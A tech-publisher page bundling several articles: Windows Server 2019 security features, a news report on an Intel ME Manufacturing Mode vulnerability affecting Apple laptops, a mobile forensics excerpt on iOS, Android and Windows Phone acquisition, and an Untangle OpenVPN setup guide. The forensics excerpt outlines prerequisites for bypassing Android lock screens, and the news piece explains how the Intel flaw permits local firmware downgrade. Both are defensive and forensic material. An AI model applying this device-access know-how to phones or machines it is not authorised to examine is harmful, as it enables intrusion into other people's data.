Windows Server 2019 has brought in many enhancements to their security posture as well as a whole new set of capabilities. In one of the sessions titled ‘Elevating your security posture with Windows Server 2019’ at Microsoft Ignite 2018, Dean Wells, a program manager in the Windows Server team, provided a rich overview of many of the security capabilities that are built-in to Windows Server with a specific focus on what’s new to Windows Server 2019. Want to develop the necessary skills to design and implement Microsoft Server 2019? If you are also seeking to support your medium / large enterprise by leveraging your experience in administering Microsoft Server 2019, we recommend you to check out our book ‘Mastering Windows Server 2019 - Second Edition’ written by Jordan Krause. Wells started off by explaining the SGX platform to further explain SGX Enclaves and its importance. SGX is a platform technology by Intel that provides a trusted execution environment on a machine that could be littered with malware and yet the trusted execution environment is able to defend itself from inspection, rights modifications, etc. Microsoft has attempted to build a similar technology to SGX, but not as strong as SGX Enclave, called as the VBS (virtualization-based security) Enclave. Wells says security threats is one of the key IT stress points. These threats further bifurcate into three areas: Managing privileged identities Securing the OS Securing fabric virtualization (VMs) and virtualization-based security Wells presented an 18-month-old data that highlighted that over three trillion dollars are impacted annually by cyber attacks; and it’s growing all the time. Source: YouTube He also presented an attack timeline to show how long it takes to find out to discover the attack. From the first entry point, it takes about an average of 24 to 48 hours to go from entry to the domain admin. These attackers dwell inside your network for around 146 days, which is alarming. The common factor in all the attacks is that attackers first seek out to exploit privileged accounts. However, one cannot actually deprecate these administrative power to avoid attacks. Source: YouTube How to secure privileged identities, OS, and fabric VMs in Windows Server 2019 Wells highlighted certain initiatives to address threats with Windows Server and/or Windows 10. Managing privileged identities Just-In-Time: Wells said that people should make sure they have privileged access workstations as this is another industry initiative that advice using workstations that are health attested and if they are not healthy, they will be unable to administer the workload assigned. AAD banned password list: This is written by the Azure Active Directory Team. This takes AI and clever matching techniques the Azure AD uses in the cloud and brings them to Windows Server AD. There are many identities on the platform but not everything is for everyone. One has to take proactive efforts to turn these features on. Securing the OS This is the area where one invests the most. In the past kernel was used to infuse code integrity; however, with Hypervisor the OS cannot directly communicate with the hardware. This is where one can lay new policies such as a code integrity policy. The Hypervisor can block things that a malicious kernel is trying to insert within the hardware. One can also secure the OS using a Control Flow Guard, the Defender ATP, and the System Guard runtime monitor. Securing fabric virtualization (VMs) and virtualization-based security These include Shielded VMs that are resistant to malware and host admin attacks on the very Hyper-V host where they are running. Users can also secure virtualization using Hyper-V containers, micro-segmentation, 802.1x support switches, etc. To know more about each section in detail, head over to the video ‘Elevating your security posture with Windows Server 2019’. What’s new in Windows Server 2019 Microsoft has made extensive use of Virtualization-Based Security (VBS) in the Window Server 2019 as this lays the foundation for protecting OS/workload secrets. The other features include: Shielded VM improvements that include branch office support, simple cloud-friendly attestations, Linux OSes, and advanced troubleshooting. Device Guard policy updates can now be applied without a reboot as there are new default policies shipped in-box and also that two or more policies can be stacked to create a combined effective policy. Kernel Control Flow Guard (CFG) ensures that user and kernel-mode binaries run as expected. System Guard Runtime Monitor runs inside the VBS Enclave keeps an eye on everything else and emits health assertions. Virtual Network Encryption through SDN, which is a transparent encryption for the VMs. Windows Defender ATP is now in-box hence no additional download is required. Trusted Private Cloud for Windows Mike Bartok from the NIST (National Institute of Standards and Technology) talked about trusted cloud and how NIST is trying to build on the capabilities mentioned by Dean. Bartok presented a NIST special publication 1800 series document that consists of three volumes: Volume A: Includes high-level executive summary that can be taken to the C-suite to tell them about cloud adoption and how you will do it in a trusted manner. It also includes a high-level overview of the project, the challenges, solutions, benefits, etc. Volume B: Takes a deeper dive into challenges and solutions. It also includes a reference architecture of various solutions to the problems, a mapping to the security controls in the NIST cybersecurity framework and 853 family. Volume C is a technical How-to-Guide that shows every step implemented to reach the solution via screenshots, or will include pointers back to Microsoft’s installation guide. One can pick up the guide and replicate the project. Security Objectives in Trusted Cloud The Security outcomes of Trusted Cloud are categorized into foundational and those in progress. Foundational security outcomes include hardware root-of-Trust based and geolocation-based asset tagging; deploying and migrating workloads to trusted platforms with specific tags. However, the others that are in progress include: Ensure workloads are decrypted on a server that meets the trust and boundary policies. Ensure workloads meet the least privilege principle for network flow. Ensure industry sector specific compliance. Deploy and migrate workloads to trusted platforms across hybrid environments. Each of these outcomes is supported by different partners including Intel, Dell-EMC, Microsoft, Docker, and Twistlock. Virtualization Infrastructure Security Multiple users have their hosts in the VM. They can say that the host is healthy because it is running fine. In a similar manner, there is no way a host could run without being provided with a key. That is how it is programmed to be. Dean explains, a solution to the security concern is a Guarded fabric running Shielded VMs. A few security assurance goals for these Shielded VMs include: Encryption of data both at rest and in-flight Here, the virtual TPM enables the use of disk encryption within a VM (for eg. BitLocker). Also, both the live migration and the VM-state are encrypted. Fabric admins locked out Here, the host administrators cannot access guest VM secrets(e.g: can’t see disks, videos, etc.). Also, they cannot run arbitrary kernel-mode code. Malware blocked: Attestation of host required Here, VM-workloads can only run on healthy hosts designated by the VM owner. However, Shielding is not intended as a defense against DoS attacks. Shielded VMs in Windows Server 2019 Shielded VM is a unique security feature introduced by Microsoft in Windows Server 2016. In the latest Windows Server 2019 edition, it has undergone a lot of enhancements. Includes Linux Guest OS support The Linux Guest OS support in Windows Server 2019 supports Ubuntu, Red Hat (RHEL), and SUSE Linux Enterprise Server inside shielded VMs. Here the host should run on Windows Server 2019. Also, these shielded VMs will fully support secure provisioning to ensure the template disk is safe and trusted. Host Key Attestation In this Shielded VM enhancement, the VMs use asymmetric key pairs to authorize a host to run shielded VMs. This will be similar to how SSH works; no more AD trusts and no certification will be required. This will allow easier onboarding process with fewer  requirements and less fragility. This will further help to get a guarded fabric up and running quickly. The Host Key Attestation has similar assurances to Active Directory attestation i.e, it checks only the host identity and not its length. Also, its best practises recommend the use of TPM attestation for most of the secure workloads. Branch Office support Here, the Hyper-V hosts can be configured with both primary and fallback HGS. This would be useful in cases where there is a local HGS for daily use and a remote HGS if the local HGS is down or unavailable. This support also enables the deployment of HGS in a shielded VM. For completely offline applications, you can now authorize hosts to cache VM keys and start up VMs even when HGS cannot be reached. This is because Cache is bound to the last successful security/health attestation event, so a change in the host’s configuration that affects its security posture invalidates the cache. Improved troubleshooting Shielded VMs include enhanced VMConnect, which permits “fully shielded” VMs. This will assist troubleshooting and also can be disabled within the shielded VM. PowerShell Direct is also permitted to shielded VMs. Here, one can combine with JEA to let the host admin fix only specific problems on the VMs without giving them full admin privileges. This can also be disabled within the Shielded VMs. Windows Server 2019 Hyper-V vswitch and EAPOL Dean also highlighted that Windows Server 2019 will have a full support for IEEE 802.1x port-based Network Access Control in Hyper-V switches. This support would be for VMs whose virtual NICs are attached to vSwitches. Wells explained a bunch of reasons to try out and use Windows Server 2019 with new capabilities. If you need a few practical examples to effectively administer Windows server 2019 and want to harden your Windows Servers to keep away the bad guys, you can explore Mastering Windows Server 2019 - Second Edition written by Jordan Krause. Adobe confirms security vulnerability in one of their Elasticsearch servers that exposed 7.5 million Creative Cloud accounts PEAR’s (PHP Extension and Application Repository) web server disabled due to a security breach Windows Server 2019 comes with security, storage and other changes
Read more
  • 0
  • 0
  • 19827
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-intel-me-has-a-manufacturing-mode-vulnerability-and-even-giant-manufacturers-like-apple-are-not-immune-say-researchers
Savia Lobo
03 Oct 2018
4 min read
Save for later

“Intel ME has a Manufacturing Mode vulnerability, and even giant manufacturers like Apple are not immune,” say researchers

Savia Lobo
03 Oct 2018
4 min read
Yesterday, a group of European information security researchers announced that they have discovered a vulnerability in Intel’s Management Engine (Intel ME) INTEL-SA-00086. They say that the root of this problem is an undocumented Intel ME mode, specifically known as the Manufacturing Mode. Undocumented commands enable overwriting SPI flash memory and implementing the doomsday scenario. The vulnerability could locally exploit of an ME vulnerability (INTEL-SA-00086). What is Manufacturing Mode? Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing. However, this mode and its potential risks are not described anywhere in Intel's public documentation. Ordinary users do not have the ability to disable this mode since the relevant utility (part of Intel ME System Tools) is not officially available. As a result, there is no software that can protect, or even notify, the user if this mode is enabled. This mode allows configuring critical platform settings stored in one-time-programmable memory (FUSEs). These settings include those for BootGuard (the mode, policy, and hash for the digital signing key for the ACM and UEFI modules). Some of them are referred to as FPFs (Field Programmable Fuses). An output of the -FPFs option in FPT In addition to FPFs, in Manufacturing Mode the hardware manufacturer can specify settings for Intel ME, which are stored in the Intel ME internal file system (MFS) on SPI flash memory. These parameters can be changed by reprogramming the SPI flash. The parameters are known as CVARs (Configurable NVARs, Named Variables). CVARs, just like FPFs, can be set and read via FPT. Manufacturing mode vulnerability in Intel chips within Apple laptops The researchers analyzed several platforms from a number of manufacturers, including Lenovo and Apple MacBook Prо laptops. The Lenovo models did not have any issues related to Manufacturing Mode. However, they found that the Intel chipsets within the Apple laptops are running in Manufacturing Mode and was found to include the vulnerability CVE-2018-4251. This information was reported to Apple and the vulnerability was patched in June, in the macOS High Sierra update 10.13.5. By exploiting CVE-2018-4251, an attacker could write old versions of Intel ME (such as versions containing vulnerability INTEL-SA-00086) to memory without needing an SPI programmer and without physical access to the computer. Thus, a local vector is possible for exploitation of INTEL-SA-00086, which enables running arbitrary code in ME. The researchers have also stated, in the notes for the INTEL-SA-00086 security bulletin, Intel does not mention enabled Manufacturing Mode as a method for local exploitation in the absence of physical access. Instead, the company incorrectly claims that local exploitation is possible only if access settings for SPI regions have been misconfigured. How can users save themselves from this vulnerability? To keep users safe, the researchers decided to describe how to check the status of Manufacturing Mode and how to disable it. Intel System Tools includes MEInfo in order to allow obtaining thorough diagnostic information about the current state of ME and the platform overall. They demonstrated this utility in their previous research about the undocumented HAP (High Assurance Platform) mode and showed how to disable ME. The utility, when called with the -FWSTS flag, displays a detailed description of status HECI registers and the current status of Manufacturing Mode (when the fourth bit of the FWSTS status register is set, Manufacturing Mode is active). Example of MEInfo output They also created a program for checking the status of Manufacturing Mode if the user for whatever reason does not have access to Intel ME System Tools. Here is what the script shows on affected systems: mmdetect script To disable Manufacturing Mode, FPT has a special option (-CLOSEMNF) that allows setting the recommended access rights for SPI flash regions in the descriptor. Here is what happens when -CLOSEMNF is entered: Process of closing Manufacturing Mode with FPT Thus, the researchers demonstrated that Intel ME has a Manufacturing Mode problem. Even major commercial manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Also, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even ‘bricking’ of hardware. To know about this vulnerability in detail, visit Positive research’s blog. Meet ‘Foreshadow’: The L1 Terminal Fault in Intel’s chips SpectreRSB targets CPU return stack buffer, found on Intel, AMD, and ARM chipsets Intel faces backlash on Microcode Patches after it prohibited Benchmarking or Comparison  
Read more
  • 0
  • 0
  • 19520

article-image-mobile-forensics
Packt
24 May 2016
15 min read
Save for later

Mobile Forensics

Packt
24 May 2016
15 min read
In this article by Soufiane Tahiri, the author of Mastering Mobile Forensics, we will look at the basics of smartphone forensics. Smartphone forensic is a relatively new and quickly emerging field of interest within the digital forensic community and law enforcement, as today's mobile devices are getting smarter, cheaper, and more easily available for common daily use. (For more resources related to this topic, see here.) To investigate the growing number of digital crimes and complaints, researchers have put in a lot of efforts to design the most affordable investigative model; in this article, we will emphasize the importance of paying real attention to the growing market of smartphones and the efforts made in this field from a digital forensic point of view, in order to design the most comprehensive investigation process. Smartphone forensics models Given the pace at which mobile technology grows and the variety of complexities that are produced by today's mobile data, forensics examiners face serious adaptation problems; so, developing and adopting standards makes sense. Reliability of evidence depends directly on adopted investigative processes, choosing to bypass or bypassing a step accidentally may (and will certainly) lead to incomplete evidence and increase the risk of rejection in the court of law. Today, there is no standard or unified model that is adapted to acquiring evidences from smartphones. The dramatic development of smart devices suggests that any forensic examiner will have to apply as many independent models as necessary in order to collect and preserve data. Similar to any forensic investigation, several approaches and techniques can be used to acquire, examine, and analyze data from a mobile device. This section provides a proposed process in which guidelines from different standards and models (SWGDE Best Practices for Mobile Phone Forensics, NIST Guidelines on Mobile Device Forensics, and Developing Process for Mobile Device Forensics by Det. Cynthia A. Murphy) were summarized. The following flowchart schematizes the overall process: Evidence Intake: This triggers the examination process. This step should be documented. Identification: In this, the examiner needs to identify the device's capabilities and specifications. The examiner should document everything that takes place during the whole process of identification. Preparation: In this, the examiner should prepare tools and methods to use and must document them. Securing and preserving evidences: In this, the examiner should protect the evidences and secure the scene, as well as isolate the device from all networks. The examiner needs to be vigilant when documenting the scene. Processing: At this stage, the examiner starts performing the actual (and technical) data acquisition, analysis, and documents the steps, and tools used and all his findings. Verification and validation: The examiner should be sure of the integrity of his findings and he must validate acquired data and evidences in this step. This step should be documented as well. Reporting: The examiner produces a final report in which he documents process and finding. Presentation: This stage is meant to exhibit and present the findings. Archiving: At the end of the forensic process, the examiner should preserve data, report, tools, and all his finding in common formats for an eventual use. Low-level techniques Digital forensic examiners can neither always nor exclusively rely on commercially available tools, handling low-level techniques is a must. This section will also cover the techniques of extracting strings from different object (for example, smartphone images) Any digital examiner should be familiar with concepts and techniques, such as: File carving: This is defined as the process of extracting a collection of data from a larger data set. It is applied to a digital investigation case. File carving is the process of extracting "data" from unallocated filesystem space using file type inner structure and not filesystem structure, meaning that the extraction process is principally based on file types headers and trailers. Extracting metadata: In an ambiguous way metadata is data that describes data or information about information. In general, metadata is hidden and extra information is generated and embedded automatically in a digital file. The definition of metadata differs depending on the context in which it's used and the community that refers to it; metadata can be considered as machine understandable information or record that describes digital records. In fact, metadata can be subdivided into three important types: Descriptive (including elements, such as author, title, abstract, keywords, and so on), Structural (describing how an object is constituted and how the elements are arranged) and Administrative (including elements, such as date and time of creation, data type, and other technical details) String dump and analysis: Most of the digital investigations rely on textual evidences, this is obviously due to the fact that most of the stored digital data is linguistic; for instance, logged conversation, a lot of important text based evidence can be gathered while dumping strings from images (smartphone memory dumps) and can include emails, instant messaging, address books, browsing history, and so on. Most of the currently available digital forensic tools rely on matching and indexing algorithms to search textual evidence at physical level, so that they search every byte to locate specific text strings. Encryption versus encoding versus hashing: The important thing to keep in mind is that encoding, encrypting and hashing are the terms that do not say the same thing at all: Encoding: Is meant for data usability, and it can be reversed using the same algorithm and requires no key Encrypting: Is meant for confidentiality, is reversible and depending on algorithms, it relies on key(s) to encrypt and decrypt. Hashing: Is meant for data integrity and cannot be 'theoretically' reversible and depends on no keys. Decompiling and disassembling: These are types of reverse engineering processes that do the opposite of what a compiler and an assembler do. Decompiler: This translates a compiled binary's low-level code designed to be computer readable into human readable high-level code. The accuracy of decompilers depends on many factors, such as the amount of metadata present in the code being decompiled and the complexity of the code (not in term of algorithms but in term of the high-level code used sophistication). Disassembler: The output of a disassembler is at some level dependent on the processor. It maps processor instructions into mnemonics, which is in contrast to decompiler's output that is far more complicated to understand and edit. iDevices forensics Similar to all Apple operating systems, iOS is derived from Mac OS X; thus, iOS uses Hierarchical File System Plus (HFS+) as its primary file system. HFS+ replaces the first developed filesystem HFS and is considered to be an enhanced version of HFS, but they are still architecturally very similar. The main improvements seen in HFS+ are: A decrease in disk space usage on large volumes (efficient use of disk space) Internationally-friendly file names (by the use of UNICODE instead of MacRoman) Allows future systems to use and extend files/folder's metadata HFS+ divides the total space on a volume (file that contains data and structure to access this data) into allocation blocks and uses 32-bit fields to identify them, meaning that this allows up to 2^32 blocks on a given volume which "simply" means that a volume can hold more files. All HFS+ volumes respect a well-defined structure and each volume contains a volume header, a catalog file, extents overflow file, attributes file, allocation file, and startup file. In addition, all Apple' iDevices have a combined built-in hardware/software advanced security and can be categorized according to Apple's official iOS Security Guide as: System security: Integrated software and hardware platform Encryption and data protection: Mechanisms implemented to protect data from unauthorized use Application security: Application sandboxing Network security: Secure data transmission Apple Pay: Implementation of secure payments Internet services: Apple's network of messaging, synchronizing, and backuping Device controls: Remotely wiping the device if it is lost or stolen Privacy control: Capabilities of control access to geolocation and user data When dealing with seizure, it's important to turn on Airplane mode and if the device is unlocked, set auto-lock to never and check whether passcode was set or not (Settings | Passcode). If you are dealing with a passcode, try to keep the phone charged if you cannot acquire its content immediately; if no passcode was set, turn off the device. There are four different acquisition methods when talking about iDevices: Normal or Direct, this is the most perfect case where you can deal directly with a powered on device; Logical Acquisition, when acquisition is done using iTunes backup or a forensic tool that uses AFC protocol and is in general not complete when emails, geolocation database, apps cache folder, and executables are missed; Advanced Logical Acquisition, a technique introduced by Jonathan Zdziarski (http://www.zdziarski.com/blog/) but no longer possible due to the introduction of iOS 8; and Physical Acquisition that generates a forensic bit-by-bit image of both system and data partitions. Before selecting (or not, because the method to choose depends on some parameters) one method, the examiner should answer three important questions: What is the device model? What is the iOS version installed? Is the device passcode protected? Is it a simple passcode? Is it a complex passcode? Android forensics Android is an open source Linux based operating system, it was first developed by Android Inc. in 2003; then in 2005 it was acquired by Google and was unveiled in 2007. The Android operating system is like most of operating systems; it consists of a stack of software components roughly divided into four main layers and five main sections, as shown on the image from https://upload.wikimedia.org/wikipedia/commons/a/af/Android-System-Architecture.svg) and each layer provides different services to the layer above. Understanding every smartphone's OS security model is a big deal in a forensic context, all vendors and smartphones manufacturers care about securing their user's data and in most of the cases the security model implemented can cause a real headache to every forensic examiner and Android is no exception to the rule. Android, as you know, is an open source OS built on the Linux Kernel and provides an environment offering the ability to run multiple applications simultaneously, each application is digitally signed and isolated in its very own sandbox. Each application sandbox defines the application's privileges. Above the Kernel all activities have constrained access to the system. Android OS implements many security components and has many considerations of its various layers; the following figure summarizes Android security architecture on ARM with TrustZone support: Without any doubt, lock screens represent the very first starting point in every mobile forensic examination. As for all smartphone's OS, Android offers a way to control access to a given device by requiring user authentication. The problem with recent implementations of lock screen in modern operating systems in general, and in Android since it is the point of interest of this section, is that beyond controlling access to the system user interface and applications, the lock screens have now been extended with more "fancy" features (showing widgets, switching users in multi-users devices, and so on) and more forensically challenging features, such as unlocking the system keystore to derive the key-encryption key (used among the disk encryption key) as well as the credential storage encryption key. The problem with bypassing lock screens (also called keyguards) is that techniques that can be used are very version/device dependent, thus there is neither a generalized method nor all-time working techniques. Android keyguard is basically an Android application whose window lives on a high window layer with the possibility of intercepting navigation buttons, in order to produce the lock effect. Each unlock method (PIN, password, pattern and face unlock) is a view component implementation hosted by the KeyguardHostView view container class. All of the methods/modes, used to secure an android device, are activated by setting the current selected mode in the enumerable SecurityMode of the class KeyguardSecurityModel. The following is the KeyguardSecurityModel.SecurityModeimplementation, as seen from Android open source project:     enum SecurityMode {         Invalid, // NULL state         None, // No security enabled         Pattern, // Unlock by drawing a pattern.         Password, // Unlock by entering an alphanumeric password         PIN, // Strictly numeric password         Biometric, // Unlock with a biometric key (e.g. finger print or face unlock)         Account, // Unlock by entering an account's login and password.         SimPin, // Unlock by entering a sim pin.         SimPuk // Unlock by entering a sim puk     } Before starting our bypass and locks cracking techniques, dealing with system files or "system protected files" assumes that the device you are handling meets some requirements: Using Android Debug Bridge (ADB) The device must be rooted USB Debugging should be enabled on the device Booting into a custom recovery mode JTAG/chip-off to acquire a physical bit-by-bit copy Windows Phone forensics Based on Windows NT Kernel, Windows Phone 8.x uses the Core System to boot, manage hardware, authenticate, and communicate on networks. The Core System is a minimal Windows system that contains low-level security features and is supplemented by a set of Windows Phone specific binaries from Mobile Core to handle phone-specific tasks which make it the only distinct architectural entity (From desktop based Windows) in Windows Phone. Windows and Windows Phone are completely aligned at Window Core System and are running exactly the same code at this level. The shared core actually consists of the Windows Core System and Mobile Core where APIs are the same but the code behinds is turned to mobile needs. Similar to most of the mobile operating systems, Windows Phone has a pretty layered architecture; the kernel and OS layers are mainly provided and supported by Microsoft but some layers are provided by Microsoft's partners depending on hardware properties in the form of board support package (BSP), which usually consists of a set of drivers and support libraries that ensure low-level hardware interaction and boot process created by the CPU supplier, then comes the original equipment manufacturers (OEMs) and independent hardware vendors (IHVs) that write the required drivers to support the phone hardware and specific component. Following this is a high level diagram describing Windows Phone architecture organized by layer and ownership: There are three main partitions on a Windows Phone that are forensically interesting: MainOS, Data, and Removable User Data (not visible on the preceding screenshot since Lumia 920 does not support SD cards) partitions; as their respective names suggest, the MainOS partition contains all Windows Phone operating system components, Data partition stores all user's data, third-party applications and all application's states. The Removable User Data partition is considered by Windows Phone as a separate volume and refers to all data stored in the SD Card (on devices that supports SD cards). Each of the previously named partitions respects a folder layout and can be mapped to their root folders with predefined Access Control Lists (ACL). Each ACL is in the form of a list of access control entries (ACE) and each ACE identifies the user account to which it applies (trustee) and specifies the access right allowed, denied or audited for that trustee. Windows Phone 8.1 is an extremely challenging and different; forensic tools and techniques should be used in order to gather evidences. One of the interesting techniques is side loading, where an agent to extract contacts and appointments from a WP8.1 device. To extract phonebook and appointments entries we will use WP Logical, which is a contacts and appointments acquisition tool designed to run under Windows Phone 8.1, once deployed and executed will create a folder with the name WPLogical_MDY__HMMSS_PM/AM under the public folder PhonePictures where M=Month, D=Day, Y=Year, H=hour, MM=Minutes and SS= Seconds of the extraction date. Inside the created folder you can find appointments__MDY__HMMSS_PM/AM.html and contacts_MDY__HMMSS_PM/AM.html. WP Logical will extract the following information (if found) regarding each appointment starting from 01/01/CurrentYear at 00:00:00 to 31/12/CurrentYear at 00:00:00: Subject Location Organizer Invitees Start time (UTC) Original start time Duration (in hours) Sensitivity Replay time Is organized by user? Is canceled? More details And the following information about each found contact: Display name First name Middle name Last name Phones (types: personal, office, home, and numbers) Important dates Emails (types: personal, office, home, and numbers) Websites Job info Addresses Notes Thumbnail WP Logical also allows the extraction of some device related information, such as Phone time zone, device's friendly name, Store Keeping Unit (SKU), and so on. Windows Phone 8.1 is relatively strict regarding application deployment; WP Logical can be deployed in two ways: Upload the compiled agent to Windows Store and get it signed by Microsoft, after that it will be available in the store for download. Deploy the agent directly to a developer unlocked device using Windows Phone Application Deployment utility. Summary In this article, we looked at forensics for iOS and Android devices. We also looked at some low-level forensic techniques. Resources for Article: Further resources on this subject: Mobile Forensics and Its Challanges [article] Introduction to Mobile Forensics [article] Forensics Recovery [article]
Read more
  • 0
  • 0
  • 18661

article-image-untangle-vpn-services
Packt
30 Oct 2014
18 min read
Save for later

Untangle VPN Services

Packt
30 Oct 2014
18 min read
This article by Abd El-Monem A. El-Bawab, the author of Untangle Network Security, covers the Untangle solution, OpenVPN. OpenVPN is an SSL/TLS-based VPN, which is mainly used for remote access as it is easy to configure and uses clients that can work on multiple operating systems and devices. OpenVPN can also provide site-to-site connections (only between two Untangle servers) with limited features. (For more resources related to this topic, see here.) OpenVPN Untangle's OpenVPN is an SSL-based VPN solution that is based on the well-known open source application, OpenVPN. Untangle's OpenVPN is mainly used for client-to-site connections with a client feature that is easy to deploy and configure, which is widely available for Windows, Mac, Linux, and smartphones. Untangle's OpenVPN can also be used for site-to-site connections but the two sites need to have Untangle servers. Site-to-site connections between Untangle and third-party devices are not supported. How OpenVPN works In reference to the OSI model, an SSL/TLS-based VPN will only encrypt the application layer's data, while the lower layer's information will be transferred unencrypted. In other words, the application packets will be encrypted. The IP addresses of the server and client are visible; the port number that the server uses for communication between the client and server is also visible, but the actual application port number is not visible. Furthermore, the destination IP address will not be visible; only the VPN server IP address is seen. Secure Sockets Layer (SSL) and Transport Layer Security (TLS) refer to the same thing. SSL is the predecessor of TLS. SSL was originally developed by Netscape and many releases were produced (V.1 to V.3) till it got standardized under the TLS name. The steps to create an SSL-based VPN are as follows: The client will send a message to the VPN server that it wants to initiate an SSL session. Also, it will send a list of all ciphers (hash and encryption protocols) that it supports. The server will respond with a set of selected ciphers and will send its digital certificate to the client. The server's digital certificate includes the server's public key. The client will try to verify the server's digital certificate by checking it against trusted certificate authorities and by checking the certificate's validity (valid from and valid through dates). The server may need to authenticate the client before allowing it to connect to the internal network. This could be achieved either by asking for a valid username and password or by using the user's digital identity certificates. Untangle NGFW uses the digital certificates method. The client will create a session key (which will be used to encrypt the transferred data between the two devices) and will send this key to the server encrypted using the server's public key. Thus, no third party can get the session key as the server is the only device that can decrypt the session key as it's the only party that has the private key. The server will acknowledge the client that it received the session key and is ready for the encrypted data transformation. Configuring Untangle's OpenVPN server settings After installing the OpenVPN application, the application will be turned off. You'll need to turn it on before you can use it. You can configure Untangle's OpenVPN server settings under OpenVPN settings | Server. The settings configure how OpenVPN will be a server for remote clients (which can be clients on Windows, Linux, or any other operating systems, or another Untangle server). The different available settings are as follows: Site Name: This is the name of the OpenVPN site that is used to define the server among other OpenVPN servers inside your origination. This name should be unique across all Untangle servers in the organization. A random name is automatically chosen for the site name. Site URL: This is the URL that the remote client will use to reach this OpenVPN server. This can be configured under Config | Administration | Public Address. If you have more than one WAN interface, the remote client will first try to initiate the connection using the settings defined in the public address. If this fails, it will randomly try the IP of the remaining WAN interfaces. Server Enabled: If checked, the OpenVPN server will run and accept connections from the remote clients. Address Space: This defines the IP subnet that will be used to assign IPs for the remote VPN clients. The value in Address Space must be unique and separate across all existing networks and other OpenVPN address spaces. A default address space will be chosen that does not conflict with the existing configuration: Configuring Untangle's OpenVPN remote client settings Untangle's OpenVPN allows you to create OpenVPN clients to give your office employees, who are out of the company, the ability to remotely access your internal network resources via their PCs and/or smartphones. Also, an OpenVPN client can be imported to another Untangle server to provide site-to-site connection. Each OpenVPN client will have its unique IP (from the address space range defined previously). Thus, each OpenVPN client can only be used for one user. For multiple users, you'll have to create multiple clients as using the same client for multiple users will result in client disconnection issues. Creating a remote client You can create remote access clients by clicking on the Add button located under OpenVPN Settings | Server | Remote Clients. A new window will open, which has the following settings: Enabled: If this checkbox is checked, it will allow the client connection to the OpenVPN server. If unchecked, it will not allow the client connection. Client Name: Give a unique name for the client; this will help you identify the client. Only alphanumeric characters are allowed. Group: Specify the group the client will be a member of. Groups are used to apply similar settings to their members. Type: Select Individual Client for remote access and Network for site-to-site VPN. The following screenshot shows a remote access client created for JDoe: After configuring the client settings, you'll need to press the Done button and then the OK or Apply button to save this client configuration. The new client will be available under the Remote Clients tab, as shown in the following screenshot: Understanding remote client groups Groups are used to group clients together and apply similar settings to the group members. By default, there will be a Default Group. Each group has the following settings: Group Name: Give a suitable name for the group that describes the group settings (for example, full tunneling clients) or the target clients (for example, remote access clients). Full Tunnel: If checked, all the traffic from the remote clients will be sent to the OpenVPN server, which allows Untangle to filter traffic directed to the Internet. If unchecked, the remote client will run in the split tunnel mode, which means that the traffic directed to local resources behind Untangle is sent through VPN, and the traffic directed to the Internet is sent by the machine's default gateway. You can't use Full Tunnel for site-to-site connections. Push DNS: If checked, the remote OpenVPN client will use the DNS settings defined by the OpenVPN server. This is useful to resolve local names and services. Push DNS server: If the OpenVPN server is selected, remote clients will use the OpenVPN server for DNS queries. If set to Custom, DNS servers configured here will be used for DNS queries. Push DNS Custom 1: If the Push DNS server is set to Custom, the value configured here will be used as a primary DNS server for the remote client. If blank, no settings will be pushed for the remote client. Push DNS Custom 2: If the Push DNS server is set to Custom, the value configured here will be used as a secondary DNS server for the remote client. If blank, no settings will be pushed for the remote client. Push DNS Domain: The configured value will be pushed to the remote clients to extend their domain's search path during DNS resolution. The following screenshot illustrates all these settings: Defining the exported networks Exported networks are used to define the internal networks behind the OpenVPN server that the remote client can reach after successful connection. Additional routes will be added to the remote client's routing table that state that the exported networks (the main site's internal subnet) are reachable through the OpenVPN server. By default, each static non-WAN interface network will be listed in the Exported Networks list: You can modify the default settings or create new entries. The Exported Networks settings are as follows: Enabled: If checked, the defined network will be exported to the remote clients. Export Name: Enter a suitable name for the exported network. Network: This defines the exported network. The exported network should be written in CIDR form. These settings are illustrated in the following screenshot: Using OpenVPN remote access clients So far, we have been configuring the client settings but didn't create the real package to be used on remote systems. We can get the remote client package by pressing the Download Client button located under OpenVPN Settings | Server | Remote Clients, which will start the process of building the OpenVPN client that will be distributed: There are three available options to download the OpenVPN client. The first option is to download the client as a .exe file to be used with the Windows operating system. The second option is to download the client configuration files, which can be used with the Apple and Linux operating systems. The third option is similar to the second one except that the configuration file will be imported to another Untangle NGFW server, which is used for site-to-site scenarios. The following screenshot illustrates this: The configuration files include the following files: <Site_name>.ovpn <Site_name>.conf Keys<Site_name>.-<User_name>.crt Keys<Site_name>.-<User_name>.key Keys<Site_name>.-<User_name>-ca.crt The certificate files are for the client authentication, and the .ovpn and .conf files have the defined connection settings (that is, the OpenVPN server IP, used port, and used ciphers). The following screenshot shows the .ovpn file for the site Untangle-1849: As shown in the following screenshot, the created file (openvpn-JDoe-setup.exe) includes the client name, which helps you identify the different clients and simplifies the process of distributing each file to the right user: Using an OpenVPN client with Windows OS Using an OpenVPN client with the Windows operating system is really very simple. To do this, perform the following steps: Set up the OpenVPN client on the remote machine. The setup is very easy and it's just a next, next, install, and finish setup. To set up and run the application as an administrator is important in order to allow the client to write the VPN routes to the Windows routing table. You should run the client as an administrator every time you use it so that the client can create the required routes. Double-click on the OpenVPN icon on the Windows desktop: The application will run in the system tray: Right-click on the system tray of the application and select Connect. The client will start to initiate the connection to the OpenVPN server and a window with the connection status will appear, as shown in the following screenshot: Once the VPN tunnel is initiated, a notification will appear from the client with the IP assigned to it, as shown in the following screenshot: If the OpenVPN client was running in the task bar and there was an established connection, the client will automatically reconnect to the OpenVPN server if the tunnel was dropped due to Windows being asleep. By default, the OpenVPN client will not start at the Windows login. We can change this and allow it to start without requiring administrative privileges by going to Control Panel | Administrative Tools | Services and changing the OpenVPN service's Startup Type to automatic. Now, in the start parameters field, put –-connect <Site_name>.ovpn; you can find the <site_name>.ovpn under C:Program FilesOpenVPNconfig. Using OpenVPN with non-Windows clients The method to configure OpenVPN clients to work with Untangle is the same for all non-Windows clients. Simply download the .zip file provided by Untangle, which includes the configuration and certificate files, and place them into the application's configuration folder. The steps are as follows: Download and install any of the following OpenVPN-compatible clients for your operating system: For Mac OS X, Untangle, Inc. suggests using Tunnelblick, which is available at http://code.google.com/p/tunnelblick For Linux, OpenVPN clients for different Linux distros can be found at https://openvpn.net/index.php/access-server/download-openvpn-as-sw.html 